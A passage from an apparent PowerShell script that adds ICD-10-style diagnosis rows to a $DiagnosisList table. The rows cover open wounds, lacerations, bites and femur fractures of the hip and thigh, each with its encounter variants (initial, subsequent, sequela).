hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified hip","Open bite, unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified hip","Open bite, unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right thigh","Unspecified open wound, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right thigh","Unspecified open wound, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right thigh","Unspecified open wound, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left thigh","Unspecified open wound, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left thigh","Unspecified open wound, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left thigh","Unspecified open wound, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified thigh","Unspecified open wound, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified thigh","Unspecified open wound, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified thigh","Unspecified open wound, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right thigh","Laceration without foreign body, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right thigh","Laceration without foreign body, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right thigh","Laceration without foreign body, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left thigh","Laceration without foreign body, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left thigh","Laceration without foreign body, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left thigh","Laceration without foreign body, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified thigh","Laceration without foreign body, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified thigh","Laceration without foreign body, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified thigh","Laceration without foreign body, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right thigh","Laceration with foreign body, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right thigh","Laceration with foreign body, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right thigh","Laceration with foreign body, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left thigh","Laceration with foreign body, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left thigh","Laceration with foreign body, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left thigh","Laceration with foreign body, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified thigh","Laceration with foreign body, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified thigh","Laceration with foreign body, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified thigh","Laceration with foreign body, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right thigh","Puncture wound without foreign body, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right thigh","Puncture wound without foreign body, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right thigh","Puncture wound without foreign body, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left thigh","Puncture wound without foreign body, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left thigh","Puncture wound without foreign body, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left thigh","Puncture wound without foreign body, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified thigh","Puncture wound without foreign body, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified thigh","Puncture wound without foreign body, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified thigh","Puncture wound without foreign body, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right thigh","Puncture wound with foreign body, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right thigh","Puncture wound with foreign body, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right thigh","Puncture wound with foreign body, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left thigh","Puncture wound with foreign body, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left thigh","Puncture wound with foreign body, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left thigh","Puncture wound with foreign body, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified thigh","Puncture wound with foreign body, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified thigh","Puncture wound with foreign body, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified thigh","Puncture wound with foreign body, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, right thigh","Open bite, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right thigh","Open bite, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right thigh","Open bite, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, left thigh","Open bite, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left thigh","Open bite, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left thigh","Open bite, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified thigh","Open bite, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified thigh","Open bite, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified thigh","Open bite, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of right femur","Fracture of unspecified part of neck of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of left femur","Fracture of unspecified part of neck of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of neck of unspecified femur","Fracture of unspecified part of neck of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of right femur","Unspecified intracapsular fracture of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of left femur","Unspecified intracapsular fracture of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified intracapsular fracture of unspecified femur","Unspecified intracapsular fracture of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of right femur","Displaced fracture of epiphysis (separation) (upper) of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of left femur","Displaced fracture of epiphysis (separation) (upper) of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified 